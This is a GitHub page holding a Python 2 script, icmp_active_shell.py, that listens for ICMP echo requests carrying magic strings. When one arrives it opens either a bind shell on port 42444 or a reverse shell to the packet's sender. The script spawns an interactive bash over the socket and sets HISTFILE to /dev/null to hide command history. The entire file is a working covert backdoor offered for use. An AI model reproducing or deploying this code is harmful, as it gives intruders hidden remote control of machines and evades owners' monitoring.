-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathicmp_active_shell.py
executable file
·145 lines (118 loc) · 3.81 KB
/
icmp_active_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
'''
Sniffs packages ICMP ECHO REQUEST to activate shell on server.
OS: Linux
Tiago Martins ([email protected])
'''
import socket
import sys
import os
import pty
import threading
from struct import *
PORT = 42444
ICMP_ECHO_REQUEST = 8
def open_shell():
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", PORT))
sock.listen(1)
(cli, addr) = sock.accept()
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Redirect standard in, out, and error
os.dup2(cli.fileno(), 0)
os.dup2(cli.fileno(), 1)
os.dup2(cli.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def open_reverse_shell(dest_address):
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Connect socket
sock.connect((dest_address, PORT))
# Redirect standard in, out, and error
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def main():
try:
# Create socket raw - icmp
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except socket.error , msg:
print "[!] Socket could not be created. Error Code : " + str(msg[0]) + " Message " + msg[1]
sys.exit()
while True:
packet = sock.recvfrom(65565)[0]
# IP packet
ip_header = packet[0:20]
iph = unpack("!BBHHHBBH4s4s", ip_header)
version_ihl = iph[0]
version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
# ICMP packet
icmph_length = 4
icmp_header = packet[iph_length:iph_length+icmph_length]
icmph = unpack("!BBH", icmp_header)
icmp_type = icmph[0]
icmp_code = icmph[1]
icmp_checksum = icmph[2]
if icmp_type == ICMP_ECHO_REQUEST:
# PAYLOAD
h_size = iph_length + icmph_length
data = packet[h_size:]
if "-*-ias-*-" in str(data).lower():
print "[>] Open shell in: " + str(s_addr)
bs_thread = threading.Thread(target=open_shell, args=())
bs_thread.start()
elif "-*-iars-*-" in str(data).lower():
print "[>] Open reverse shell in: " + str(s_addr)
brs_thread = threading.Thread(target=open_reverse_shell, args=(str(s_addr),))
brs_thread.start()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass